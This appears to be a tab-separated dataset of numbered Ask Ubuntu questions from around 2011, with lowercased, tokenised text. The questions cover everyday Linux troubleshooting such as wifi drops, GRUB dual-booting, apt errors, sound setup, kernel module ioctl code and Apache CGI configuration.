54153	my wifi gets deauthenticated every few minutes or seconds ( reason : 7 )	my wifi on my new thinkpad w520 running natty keeps dropping out and coming back on . output from dmesg below . any advice ? [ 30493.687552 ] wlan0 : authenticate with e0:91 : f5 : ef:7b : b2 ( try 1 ) [ 30493.689127 ] wlan0 : authenticated [ 30493.689144 ] wlan0 : associate with e0:91 : f5 : ef:7b : b2 ( try 1 ) [ 30493.693592 ] wlan0 : rx assocresp from e0:91 : f5 : ef:7b : b2 ( capab=0x411 status=0 aid=4 ) [ 30493.693595 ] wlan0 : associated [ 31631.172868 ] wlan0 : deauthenticated from e0:91 : f5 : ef:7b : b2 ( reason : 7 ) [ 31631.211847 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 31631.211868 ] cfg80211 : restoring regulatory settings [ 31631.211873 ] cfg80211 : calling crda to update world regulatory domain [ 31631.215037 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 31631.215042 ] cfg80211 : world regulatory domain updated : [ 31631.215044 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 31631.215046 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 31631.215049 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 31631.215051 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 31631.215053 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 31631.215055 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 31632.289638 ] wlan0 : authenticate with e0:91 : f5 : ef:7b : b2 ( try 1 ) [ 31632.291262 ] wlan0 : authenticated [ 31632.291276 ] wlan0 : associate with e0:91 : f5 : ef:7b : b2 ( try 1 ) [ 31632.295119 ] wlan0 : rx assocresp from e0:91 : f5 : ef:7b : b2 ( capab=0x411 status=0 aid=4 ) [ 31632.295123 ] wlan0 : associated [ 31886.234836 ] wlan0 : deauthenticated from e0:91 : f5 : ef:7b : b2 ( reason : 7 ) [ 31886.306735 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 31886.306740 ] cfg80211 : restoring regulatory settings [ 31886.306744 ] cfg80211 : calling crda to update world regulatory domain
54155	deleted my home folder , how to get it back ?	i stupidly deleted my home folder in natty . it 's still in the trash but i cant get there to undo . any help will be greatly appreciated . searching i could n't find any solutions because i do n't think anybody else did that yet . i can only use the command line at this stage , and i 'm noob at that .
54157	how do i set xmodmap on login ?	as my keyboard layout does n't suit me , i run xmodmap on login . the script is named .profile and it runs ok , but it breaks the unity interface . i want to know where to put the xmodmap line so that it executes on my login and does n't break anything . i have already tried putting it in the .bash_login and .bash_profile files , without success ( xmodmap does n't set my keyboard ) . what are my options ?
54159	how do i change the theme ?	what do i use to change the theme in ubuntu 11.04 desktop the previous way through appearance icon is gone .
54161	ca n't get trim test to work	so i 'm attempting to install trim using the walkthrough here : how to enable trim ? but everytime i attempt to run the hdparm command , i get the following when i try to run it w/ sda : reading sector 5805056 : failed : input/output error and i get this when running it with sda1 : /dev/sda1 : device /dev/sda1 has non-zero lba starting offset of 2048 . please use an absolute lba with the /dev/ entry for the full device , rather than a partition name . /dev/sda1 is probably a partition of /dev/sda ( ? ) the absolute lba of sector 5807104 from /dev/sda1 should be 5809152 aborting . i 'm running natty in a vbox on windows 7 . someone please help.. i keep getting this `` consistency check '' message on boot of my machine and i think it 's because ubuntu is writing to the same sectors on the vhd too much.. need to get trim working on this thing.. thanks .
54162	how do i detect if someone is stealing my broadband bandwidth ?	i am very paranoid about wireless connections and someone stealing my broadband bandwidth , which could lead to worse things . my question is , how can i detect if my broadband bandwidth is being stolen ? i have a belkin surf+ n300 wireless router . ideally , it would be cool if i would get alerted automatically , but if that is not possible , then a manual process would be fine .
54167	how to roll back newly applied lts maintenance upgrade to the previous version	is there a way to roll back a lts maintenance upgrade to the previous version , say from 10.04.02 lts from 10.04.03 lts ? i am not facing a problem now , but need to figure out means to back out the packages before i rollover to 10.04.03 lts on my server , in case of any need .
54171	chromium 's extensions hiding in a menu	after adding then removing a fourth extension from my panel in chromium , all but the first extension are hidden in a menu like so : i 've tried dragging the address bar to the left and the icons reappear , but the bar snaps back when i let go .
54175	ca n't select os with remote in burg	i use burg where i can select one of 3 os ( openelec - windows - ubuntu ) . but selecting do n't work with my remote control . i can use my remote for starting the system , but not for choosing the os . who can help me ?
54176	why is plymouth required ?	why is plymouth so important that can not be removed on ubuntu desktop 11.04 ? it has priority required and mountall and cryptsetup depend on it . i do not have really any need to remove it , but a friend asked , so i am just curious .
54181	ubuntu not showing in the grub boot loader after installation	i installed ubuntu 11.04 alongside windows 7 on a partition that previously had ubuntu 10.04 . it installed perfectly but on completion , after the reboot , the boot menu shows just 'memtest ' and windows 7 as options - no option for loading ubuntu .
54185	ubuntu one oauth login from php	i have searched the whole internet trying to find a simple example that could point me in the right direction , but no luck , so here comes my questions : i want to log into ubuntu one and sync ( or almost read ) files from my web page , all done with php . the needs to reach files are all described in that page : https : //one.ubuntu.com/developer/account_admin/issue_tokens/cloud/ i am able to complete the first request with : $ url = 'https : //login.ubuntu.com/api/1.0/authentications ? ws.op=authenticate & token_name=ubuntu % 20one % 20 @ % 20try1 ' ; $ data = curlpetition ( array ( 'url'= > $ url , 'userpwd'= > 'user : pass ' ) ) ; $ ar = fopen ( 'uone ' , 'w ' ) ; fwrite ( $ ar , $ data [ 'responsebody ' ] ) ; fclose ( $ ar ) ; $ tokena = json_decode ( $ data [ 'responsebody ' ] ,1 ) ; ok , curlpetition only makes basic curl petitions . note that you need a valid user : pass ubuntu one account . i get the response correctly in json with `` consumer_secret '' , `` token '' , `` consumer_key '' , `` name '' , `` token_secret '' . even the entry appear listed in the ubuntu one 's granted apps . i hace installed the most new oauth pcl php extensi贸n and its working good . but when i try to : $ api_url = 'https : //one.ubuntu.com/api/file_storage/v1/ ' ; $ conskey = $ tokena [ 'consumer_key ' ] ; $ conssec = $ tokena [ 'consumer_secret ' ] ; $ token = $ tokena [ 'token ' ] ; $ secret = $ tokena [ 'token_secret ' ] ; $ oauth = new oauth ( $ conskey , $ conssec , oauth_sig_method_hmacsha1 , oauth_auth_type_uri ) ; $ oauth- > enabledebug ( ) ; $ oauth- > enablesslchecks ( ) ; $ oauth- > settoken ( $ token , $ secret ) ; $ oauth- > fetch ( $ api_url . '~/ubuntu % 20one/ ' ) ; print_r ( $ oauth- > getlastresponse ( ) ) ; i get moved to the `` openid transaction in progress '' page where you pass when doing a manual web login . im definitely doing something wrong . i tried to get the second step from https : //one.ubuntu.com/developer/account_admin/issue_tokens/cloud/ with $ oauth- > fetch , $ oauth- > getaccesstoken and $ oauth- > getrequesttoken , same response on all with 403 error : s i was trying to figure how the payload works but the main examples are writed with python , using `` import ubuntuone.couch.auth as auth '' that makes the token stuff almost automatic . i 'll love to get some hints . thanks
54193	usb hard drive sleeps even when in use	i have very small arm computer with ubuntu 9.04 ( jaunty ) running as a backup and media server for my house . i have attached a new `` wd my passport '' 750gb usb drive to it . the drive is recognized and i can mount it and read/write files fine . after several minutes , the drive goes to sleep , even if i was in the middle of writing a backup to it . i can force it to start again with sdparm , but it needs to not shut itself down while it 's being written to in the first place . i have tried this command to disable the standby state but it does n't work : root @ plug : ~ # sdparm -- clear standby -6 /dev/sdb /dev/sdb : wd my passport 0730 1008 change_mode_page : failed setting page : power condition i have also been told to change /sys/block/sdb/device/allow_restart from 0 to 1 , but no such file exists and one can not be written there . the hardware itself is fine , if i plug it into a windows computer , it will not sleep while in use . is there anything else i can try to make this drive workable in linux ?
54195	kubuntu 11.04 network manager wo n't let me choose a wireless security method for my network	i just installed kubuntu 11.04 on a machine , it 's a completely fresh install . my network is called `` linksys '' ( do n't blame me , someone else set it up ) , and i know for a fact it is secured by wpa2 personal . i am in fact connected to it on a different machine ( also running kubuntu 11.04 ) on the same network as i type this right now . i also know the network card works with this os . i just had a different install of kubuntu 11.04 on it before , just reformatted and installed fresh . it was working fine on the old install . here 's what 's happening . when i go to add a wireless network connection , and type `` linksys '' as the wireless ssid , then go to the wireless security tab , the dropdown for `` security '' contains only the option `` none '' . if i type in any other ssid , the security dropdown is normal ( containing options like wep , wpa/wpa2 personal , etc ... ) . so it seems it is only not letting me select a security method for my network , `` linksys '' . almost like it has decided for some reason it is definitely not a secured network . but it is . if i try to connect to it without selecting a security , it simply fails . and , as i said , i am connected to it right now on a different computer with the same os using wpa2 personal . any reason why this might be happening ?
54196	synchronization of folders ubuntu one	i have shared a folder ubuntuone and i accepted . i go to panel ubuntuone , put synchronize that folder , put synchronize that folder , i can not find and synchronizable . where do these folders are ?
54201	switch between classic and new workspace windows ( how do i ) ?	how do i switch back to classic view from updated view ? installed with classic view . it ran , but when updated it switched windows view . i can not drag any apps to workspace and can not install bars at top or bottom of workspace for apps .
54202	can i automatically kill any application that uses more than a certain percentage of the cpu and/or ram ?	what i need from my computer , now that it 's summer at least , should never use a lot of resources - when applications do so it 's because of some kind of bug or memory leak . is there any way to automatically kill any application that uses , for example , more than 15 % of the cpu or more than 450 mbs of ram ? i would like to use this trick , if it 's possible , at either 11.04 or 11.10 .
54204	how to dual boot two different linux distributions ?	i am looking for a way to multiboot windows , lubuntu ( natty ) , and arch linux . i know how i could set it up , but i want to know the right way . right now each distro has their own grub install , and their own /boot is there a way to use the same /boot ? or maybe i should just uninstall the one from arch and have the lubuntu one do the job . edit : maybe i can chain load one to the other ? that might not be the right way , but it 's certainly an easy and maintainable solution . update : so i did some research , and there are a two ways to do this . first off , i have grub1 on arch and grub2 on lubuntu ( no particular reason , this is default ) use a single grub install from either distro . chainload from one install to another by installing the grub bootloader onto a partition . first , i tried to do 2. , but grub-install ( grub2 ) gave me this big warning about installing onto partition , so i decided this was a bad idea . then i figured that i could just use the grub1 install on ubuntu and grub-update would auto detect arch linux . so , i resintalled grub2 onto the mbr , but grub-update was not able to auto-detect arch . # so , my updated question is ... what do i need to add to grub.d to either make it auto-detect arch , or just make a manual entry ? there is nothing wrong with a manual entry , but an example script that does this would be useful.. edit : looks like it was a problem with chrooting into lubuntu from arch . i reran update-grub from lubuntu and it works fine now .
54208	complete linuxmint theme for ubuntu	i am using the ubuntu 11.04 with unity from the day of it 's release . i am not at all happy with the usability of unity . like no minimize by clicking on the icon on the task bar , menus at the top bar etc . specially the new application menu , it 's hell lot difficult to find an application . recently i tried the linuxmint ubuntu version and i am quite happy with the gui and overall look of the distro , until i had install the update in the new linuxmint . i faced some video issue , which i was not able to resolve even with the help of the linuxmint community . again i revert back to ubuntu . i tried the ubuntu classic but i feel it is wasting a lot of screen space in my small 15 '' laptop . so , is there any way i can get the linuxmint complete theme in ubuntu 11.04 . i know there are repos to install the mintmenu but i need the at least same theme of linuxmint desktop look and feel in ubuntu like single task bar bottom and mintmenu .
54212	is there a way to close cmus without quitting ?	i 'm using cmus to listen to music now.one problem is that i could n't close the interface while listening , i.e . keep it running background.the raw ' & ' does n't work.i know moc ( p ) has the function , just pressing 'q ' , is there a similar way for cmus ?
54215	can i 'fake ' an ncurses environment ?	i 'm trying to get an fm radio stick working on my streaming box . it uses the command 'radio ' for tuning , but the command seems to be running in order for the radio to work ( i.e . i ca n't just tune it then forget about it ) . unfortunately , if i try to use a wrapper that runs the command in the backgroup , it does n't seem to work , as it is ncurses based , and does n't seem to like being run in batch mode . like xvfb can be used to 'fake ' an x session , can i do the same for ncurses ?
54217	move the whole installed files to another partition	i have installed ubuntu on a 8gb 5gb partition . as i have installed many packages , i am running out of space . qn 1 : is there a way that i can specify another portion for installing the packages ? qn 2 : can i move the whole installed files from my current partition to another place ( partition ) and make the changes in grub or so ? i do n't want to reinstall the whole , so after that i just can make an upgrade : - ) the / , and home directory is in same place . thank you .
54220	is there a tomboy fork which allows embedding images ( or files ) ?	is there an application that works exactly like tomboy which allows you to embed images ( or files ) into the notes ? not links to the images , but actually in the note itself .
54221	how to edit files in a terminal with nano ?	sometimes , a graphical text editor like gedit or kate can not be used ( because you 're in a virtual console for example ) . luckily , there are text editors for the terminal . an easy one is nano , but i can not understand how to work with it . if i start nano by running nano , the bottom text is supposed to help me but all i see are things like ^g get help ^o writeout . how can i open text files for editing ? how can i save the file ? how can i quit the editor without saving the changes ? how to edit ? i heard that you 've to enter some commands to begin editing in vi , is this true for nano too ? sometimes , if i manage to open a file , the text is unreadable due to its colors . how can i disable these colors ? ( see the image below ) in the some files , lines are truncated because those do not fit in the screen . how can i prevent that from happening ? ( see the image below )
54228	use headphone+microphone ports for 2.1 sound	i have a laptop with a headphone and microphone port based on the following sound card : 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 05 ) recently some 2.1 speakers found their way in to my possession , as these things do . i 'm not using them for much at the moment but while we 're moving house ( we 're going to be staying with friends for a week or two ) i 'd like to be able to have some decent sound , even if it 's only 2.1 . given that the laptop only has two ports and one of those is a microphone , i wondered if there 's any way that i can re-purpose the microphone port and turn it into lfe port for the subwoofer . i 'm sure i 've seen this done before a while back ( it was probably when i used windows , all those years ago ) . i realise being able to do this is hardware specific . failing that , does anybody know a nice ( cheap ! ) usb sound card that ubuntu will cope with being plugged in and unplugged while running , and will give me 2.1 ?
54229	hardening my ubuntu 10.04 os against ungraceful shutdowns	there 's a system that a customer has that runs our software that is just going to be powered off at arbitrary times . ups is not an option because the unit is moved from place to place . think of it as a psuedo-embedded system . it 's headless and has no internet/lan connections , meaning that until the customer followed our instructions to remotely debug , no one had so much as logged in for several boot cycles before the problem arose . the system uses , among other things , usb to serial converters running ftdi drivers . recently the system was working great , and as expected , was powered off , then came up using uhci_hcd drivers for usb to serial converters . clearly something went wrong on shutdown and left the filesystem in some sort of bad shape . is there any way around this ? i 'm not concerned about guarantees for our software , i want to guarantee os stability and consistency . do we need to rethink ubuntu 10.04 ? i know it 's a bit overkill if we do n't even log in 99 % of the time , but the driver support seems a little better and the installation is perhaps a little nicer than other distributions . does anyone have experience hardening a system in this manner ? things on my list would include automatically resolving file system checks with no user interaction , uninstalling unneeded packages that might cause configuration/timing issues , etc . to be clear , data loss is not a concern -- always booting up into the same configuration is a top priority . any good resources for reading up on this ? i do n't even know what i would search for exactly -- i have n't done a ton in the way of hard core sysadmin stuff in the past .
54234	i want to make every window as transparent with font as opaque ( as gnome terminal capabality )	i want to make every window ] transparent with opaque text . i have done some search on the internet and the answer i got is : open compiz config settings manager . click on opacity , brightness and saturation in the accessibility section . under 'window specific settings ' click 'new' type ' ( type=any ) ' into the 'windows ' text box and set 'window values ' to 20 . this works but makes the content of the window transparent ( including the text ) as well as the background . and also there are provided options to increase and decrease opacity . on the same page i am successfully able to utilise that feature by configuring keyboard shortcuts as well as mouse shortcuts , but i was not able to add a shortcut that uses the scrolling of the middle mouse button . i think these two feature would help me as well as ubuntu to a great extent . right now i am using ubuntu 11.04 . in 11.10 i heard gnome 3 will be used and this uses mutter . what happens to compiz ? as a summary i have 3 questions how can i give every window a transparent background while keeping opaque content ? how can i use the mouse wheel to increase and decrease opacity ? what will happen to compiz in 11.10 ?
54236	opened programs in unity	i noticed a problem on unity . so , when i open , for example , program eclipse which is ide for programming languages as java and php it does n't showed as opened in unity box , so if i minimize this program i ca n't open it again , because when i pres on eclipse icon in unity box it starts eclipse again not open previous minimized program . how to fix this , because otherwise i have to use basic ubuntu layout to use some programs ?
54237	no response form top panel / menu on samsung n150 plus netbook	i have an intermittent problem accessing the top panel/menu bar using the mouse in ubuntu 11.04. sometimes i can access it with the mouse right click ( as per normal ) , other times it is completely unresponsive whether using an external mouse of the mouse-pad . as i am new to linux , i do n't know if there is anyway to create a debug report or some other dump for the status of this menu . its very irritating , especially when having to connect to a wifi network when on business but ca n't just right click and select the network . i ended up downloading wicf to manage my connections in a pop-up window but this is buggy too . i have the same set up on my desktop and the top menu/panel is accessible 100 % , never fails . any suggestions pls ?
54239	problem with ioctl ( ) in a simple kernel module	i am trying to build a simple kernel module . following are the contents of file involved in it : module.c : # include < linux/init.h > # include < linux/fs.h > # include < linux/device.h > # include < linux/kernel.h > # include `` header.h '' static int device_open ( struct inode *inode , struct file *file ) { printk ( `` \n open \n '' ) ; return 0 ; } static int device_ioctl ( struct inode *inode , struct file *filp , unsigned int cmd , unsigned long args ) { switch ( cmd ) { case ioctl_cmd : printk ( kern_alert `` \n % s \n '' , ( char * ) args ) ; break ; } return 0 ; } static int device_release ( struct inode *inode , struct file *file ) { printk ( `` \n release \n '' ) ; return 0 ; } static struct class *my_class ; static struct file_operations fops= { .open = device_open , .release = device_release , .compat_ioctl = device_ioctl } ; static int hello_init ( void ) { major_no = register_chrdev ( 0 , device_name , & fops ) ; printk ( `` \n major_no : % d '' , major_no ) ; my_class = class_create ( this_module , device_name ) ; device_create ( my_class , null , mkdev ( major_no,0 ) , null , device_name ) ; printk ( `` \n device initialized in kernel ... . ! ! ! `` ) ; return 0 ; } static void hello_exit ( void ) { printk ( `` \n device is released or closed \n '' ) ; device_destroy ( my_class , mkdev ( major_no,0 ) ) ; class_unregister ( my_class ) ; class_destroy ( my_class ) ; unregister_chrdev ( major_no , device_name ) ; printk ( `` \n===============================================================\n '' ) ; } module_init ( hello_init ) ; module_exit ( hello_exit ) ; module_license ( `` gpl '' ) ; appln.c # include < stdio.h > # include < fcntl.h > # include < string.h > # include `` header.h '' int main ( ) { int fd ; char * msg = `` yahoooo '' ; fd = open ( device_path , o_rdwr ) ; ioctl ( fd , ioctl_cmd , msg ) ; printf ( `` ioctl executed\n '' ) ; close ( fd ) ; return 0 ; } header.h : # include < linux/ioctl.h > # include < linux/kdev_t.h > /* for mkdev */ # define device_name `` my_dev '' # define device_path `` /dev/my_dev '' # define write 0 static int major_no ; # define magic_no '4' /* * set the message of the device driver */ # define ioctl_cmd _ior ( magic_no , 0 , char * ) my module loads perfectly ( i can see the mesg in hello_init ( ) function ) . but when i run the appln.c program , even when it makes the ioctl ( ) call , i see no result of it . can someone tell why is the module ignoring my ioctl call . thanks ,
54240	remap keys like vi	i 'd like to achieve a remapping of keys in a way that simulates the vi flow of having editing mode and command mode . in windows , it can be achieved as explained in the site . in the comments , it is suggested a way that might work in linux , but i ca n't put it to work . to better explain what i want , this is an example of the effects with the windows solution : i 'm editing something in notepad . if i press f , it should type an `` f '' letter . however if i press caps + f , then it should move a line down ( caps was configured as the command key ) .
54241	how do i update an iso with zsync ?	the context here is the oneric development iso . i do n't want to have to re-download this every time something changes . i notice that there 's a .zsync file in the download directory . from what i know , this should let me update only the chunks that have changed , saving a ton of bandwidth . the only problem is , i do n't have a clue what i 'm doing : ) could somebody push me in the right direction to keep oneiric-desktop-amd64.iso up to date ?
54242	apt-get update error : unable to find expected entry contrib/source/sources in meta-index file	i 've made a horrible mistake and removed gtk ( and all linked packets , including gnome ) . after that , i 've recovered my gui with sudo apt-get install ubuntu-desktop and most of key packets , but now i 'm getting error when i 'm trying to do sudo apt-get update : hit http : //repo.yandex.ru maverick release.gpg hit http : //ru.archive.ubuntu.com maverick release.gpg ign http : //repo.yandex.ru/ubuntu/ maverick/main translation-en ign http : //repo.yandex.ru/ubuntu/ maverick/main translation-en_us ign http : //repo.yandex.ru/ubuntu/ maverick/main translation-ru ign http : //repo.yandex.ru/ubuntu/ maverick/non-free translation-en ign http : //ru.archive.ubuntu.com/ubuntu/ maverick/contrib translation-en ign http : //ru.archive.ubuntu.com/ubuntu/ maverick/contrib translation-en_us ign http : //ru.archive.ubuntu.com/ubuntu/ maverick/contrib translation-ru ign http : //ru.archive.ubuntu.com/ubuntu/ maverick/main translation-en ign http : //ru.archive.ubuntu.com/ubuntu/ maverick/main translation-en_us hit http : //ru.archive.ubuntu.com/ubuntu/ maverick/main translation-ru ign http : //repo.yandex.ru/ubuntu/ maverick/non-free translation-en_us ign http : //repo.yandex.ru/ubuntu/ maverick/non-free translation-ru hit http : //repo.yandex.ru maverick release ign http : //ru.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en ign http : //ru.archive.ubuntu.com/ubuntu/ maverick/restricted translation-en_us hit http : //ru.archive.ubuntu.com/ubuntu/ maverick/restricted translation-ru hit http : //ru.archive.ubuntu.com maverick release hit http : //repo.yandex.ru maverick/main i386 packages hit http : //repo.yandex.ru maverick/non-free i386 packages hit http : //ru.archive.ubuntu.com maverick/main sources w : failed to fetch http : //ru.archive.ubuntu.com/ubuntu/dists/maverick/release unable to find expected entry contrib/source/sources in meta-index file ( malformed release file ? ) e : some index files failed to download , they have been ignored , or old ones used instead . i 've issued sudo apt-get clean all and it changed nothing . /etc/apt/sources.list looks like : deb http : //ru.archive.ubuntu.com/ubuntu/ maverick main contrib restricted deb-src http : //ru.archive.ubuntu.com/ubuntu/ maverick main contrib restricted deb http : //repo.yandex.ru/ubuntu/ maverick main non-free sudo apt-get update works fine without contrib in deb records is there any way to fix to that problem ? i am using ubuntu 10.10 .
54248	dual screen with two ati cards	i 'm trying to get a dual screen setup he main monitor in landscape and the other on portrait . with the ati binary drivers ( ccc ) i could have both monitors working although i could n't activate xinerama because ubuntu wo n't even load the gui . using the open source drivers i do n't know where to activate my second card to the second monitor . i 'm using ubuntu 11.04 with two video cards each card has connected one monitor . here is my lspci : elio @ main : ~ $ lspci -nn | grep vga 03:00.0 vga compatible controller [ 0300 ] : ati technologies inc radeon hd 5870 ( cypress ) [ 1002:6898 ] 04:00.0 vga compatible controller [ 0300 ] : ati technologies inc radeon hd 5870 ( cypress ) [ 1002:6898 ] thanks in advance .
54250	safely remove usb modem ?	in short : before unplugging a usb modem , should i take any action to make the removal safe ? i received a huawei-367 , it worked great the first day . the next morning the modem was very warm and had no internet connection . i tried to re-connect but it did not work , however it was blinking and ubuntu did recognize i had a usb modem plugged . so i unplugged it and re-plugged it . however now it was as if the usb-device had died . ubuntu no longer recognized it and no modem-lights were showing . i also tried plugging it in on a mac and nothing was mounted . it could be that the device was a faulty one and broke due to the heat . however i am afraid that it was me unplugging it without first somehow unloading the device properly which caused it to break ( perhaps writing random data to the firmware or something ) . on the other hand , i previously had a different huawei model which i frequently unplugged and replugged without any problems . now i would like to unplug my modem but i am not sure how to do it and i would not like to break another one .
54251	how do i make apache run a cgi instead of showing the text ?	i 'm trying to install bugzilla 4 on ubuntu 11.04 i 've added the following to my httpd.conf < directory “/var/www/dev.spincentre/bugzilla” > addhandler cgi-script .cgi options +indexes +execcgi directoryindex index.cgi allowoverride limit < /directory > but when i go to the url , apache shows the text of index.cgi instead of executing the script . any idea how to fix it ?
54261	copy/paste frequently broken	most of the time i ca n't copy/paste text anymore . neither via right mouse - > copy/paste nor via ctrl+c/v . the result of copying from gedit `` test1234 '' and pasting it back into gedit is `` â°ăś '' . but the resulting 4-char strings vary from time to time . the only copy/paste variant that seems to work correctly all the time is the middle-mouse copy in terminal . the applications i tested are : gedit , terminal , firefox , eclipse in all of those the problem was there . locales are set to _en_gb.uft8_ ( dunno whether this is relevant ) . the strangest thing is , that there are short moments copy/paste works just fine . thanks a lot for your help in advance !
54262	is it possible to run pbuilder without root privileges ?	i realize that setting up pbuilder requires root privileges , but does each invocation really require root privileges ? is there any way of running pbuilder as a standard user ?
54264	color-leveling an image via command-line	from a script , i 'm trying to apply some color levels to a grayscale .tiff image ( the same as i would do in gimp ) . i 've tried using imagemagick 's convert tool : convert input.tiff -level 102,200,0.85 output.tiff and also convert input.tiff -level 102,0.85,200 output.tiff but all i get is a blank image . any ideas ? ? are there other ways around ?
54265	how to configure 5.1 surround sound through three 3.5 mm jacks ?	in my dell xps 15 i have an onboard sound card which is 'intel high definition audio' description : audio device product : 5 series/3400 series chipset high definition audio vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 06 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:50 memory : f0900000-f0903fff and also a nvdia video card with hdmi output . description : audio device product : gf108 high definition audio controller vendor : nvidia corporation physical id : 0.1 bus info : pci @ 0000:02:00.1 version : a1 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:17 memory : adefc000-adefffff the problem is my sound system ( creative inspire 5300 ) take input through three 3.5 mm jacks one for front right and left , one for rear right and left , and one for center and subwoofer . in windows 7 when i connect each jack it asks me which device am i connecting and i can select each one accordingly . ( the rear two speakers were connected to the mic in port of the system . ) now in ubuntu 11.04 i can not configure the system to get the sound out through the 3.5 mm jacks.. i can select the sound device to get the sound out through the hdmi port but unfortunately i do n't have an hdmi surround system.. please help me to configure the system to get the sounds through the 3 jacks.. ?
54266	executing .bat file	i have a setup.bat file which install some applications and i want to execute it . this is content of .bat file : @ echo off cls rip_7z.exe x rip0.7z cls del rip0.7z cls rip_7z.exe x rip1.7z cls del rip1.7z i think the rip_7z.exe file extracts the rip0.7z and rip1.7z files and builds the app . how can i do this in the ubuntu 11.04 terminal ?
54268	why are n't my ppa 's showing up in the ubuntu software center ?	when i add a ppa via software sources it normally would show up in the ubuntu software center shortly after . but lately it seems that any ppa i add either wo n't show up , or takes days to . does anyone know what could be wrong ?
54272	how do i get guake ( terminal ) to report the correct terminal ?	i 've been using guake on my laptop and my desktop and everything has been fine until i recently bought a new hd and did a fresh install of ubuntu 10.10 . i installed guake and it works fine except for when i try to use gnu screen : wayne @ arglefraster : ~ $ screen -xrr please set a terminal type . wayne @ arglefraster : ~ $ echo $ term dumb in my guake config preferences i have /bin/bash set as my default interpreter - which is the same thing that i have on my laptop . both xterm and gnome-terminal shows xterm as the term value , and even ctrlaltf1 shows linux . so how do i get guake to use the proper term value so i can avoid having to export term=xterm in my guake every time ?
54275	up to date tutorial for writing compiz plugins ?	a quick google search reveals very few tutorials on writing compiz plugins and even fewer seem to be up to date . none that i can find are written specifically for ubuntu . i basically need to know : what packages i will need . how plugins are stored / organized . how plugin code should be structured . how to use cmake with my plugin .
54276	battery starts discharging after charge	in ubuntu 10.10 and 11.04 my dell mini 9 starts to discharge and run off of battery very soon after it is fully charged while it 's still plugged into the the power adapter . if i restart it still does n't see the ac adapter . if i shutdown and cold boot it will start charging again until the battery is full and the circle begins a new . it started happening at some point with 10.10 and i just now am getting around to doing something about it . the mini 9 is running it 's latest bios a07 . i opened the thing up to check for loose charger connections and everything looks good . is there a different power management driver i can try ? is there a power management log i can check somewhere ? edit : what libraries do i roll back and lock to 10.04 or up to 11.10 ? i 'd like to keep with 11.04 if possible until 11.10 is officially released .
54279	burning mkv to vcd	i am trying to use brasero , to burn a mkv file of 300mb size to a blank cd and it nags that cd has not enough disk , i used mkvmerge to break it to 4 100 mb files it still nags that it cant burn it due to size , anyone knows how may i do it ?
54290	asus eee pc 1201n internet connection very slow	i have a big problem after installing ubuntu 11.04 on asus 1201n netbook : internet connection very slow . when i am trying to connect to my gmail account i must wait about 3 minutes . and i have 12mb internet connection . maybe it 's https do the problem , but it can n't be so havy ... system works very slow even if i switch to ubuntu classic interface without compiz effects . i have this os on other computer and it works fine ( very quick perfomance with maximum graphic effects ) how can i fix my problems ? or maybe asus it is a not good pc for linux releases ? thank you this is what i got after sudo lshw -class network : *-network description : wireless interface product : rtl8191seva wireless lan controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : wlan0 version : 10 serial : 1c:4b : d6:84:4c:0d width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl819xse driverversion=0017.0507.2010 firmware=63 ip=192.168.14.108 latency=0 link=yes multicast=yes wireless=802.11bgn resources : irq:18 ioport : d800 ( size=256 ) memory : fbefc000-fbefffff *-network description : ethernet interface product : ar8132 fast ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : c0 serial : 48:5b:39:5f:83:9b capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:41 memory : fbfc0000-fbffffff ioport : ec00 ( size=128 )
54292	disabled ethernet nic keeps enabling itself	my new ubuntu 11.04 server is having issues with the two ethernet ports on the motherboard . i only need one port , eth1 so i am trying to disable eth2 . i executed sudo ifconfig eth2 down which only worked temporarily as eth2 repopulated in ifconfig within a short time . i then modified /etc/network/interfaces to disable it : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth1 iface eth1 inet dhcp # auto eth2 # iface eth2 inet dhcp and executed sudo /etc/init.d/networking restart and even rebooted the system . for some reason , after about 10-30 mins , eth2 re-enables itself and interrupts all network traffic on eth1 . how can i prevent eth2 from ever enabling itself ?
54295	missing partition space after installation	after i installed ubuntu 11.04 in a partition that i delegated 100gb for . i realize that i only have 10gb left , where did the rest of the space go ? the volume size states i have 100gb for that partition . screenshot ( df command ) :
54296	difference between the i386 download and the amd64 ?	what is the difference between standard i386 download and the amd64 download of ubuntu 11.04 ? i am currently running the i386 on an amd machine , would my system work better with the amd64 download instead ? ( my machine was running windows 7 64bit , but i neglected to look at that prior to installing ubuntu ) .
54301	how to find out what version of ubuntu was originally installed ?	given a machine that may or may not have been through a number of release upgrades , how can i find out the version of ubuntu that was originally installed ? assuming that logging configuration has not been changed from default .
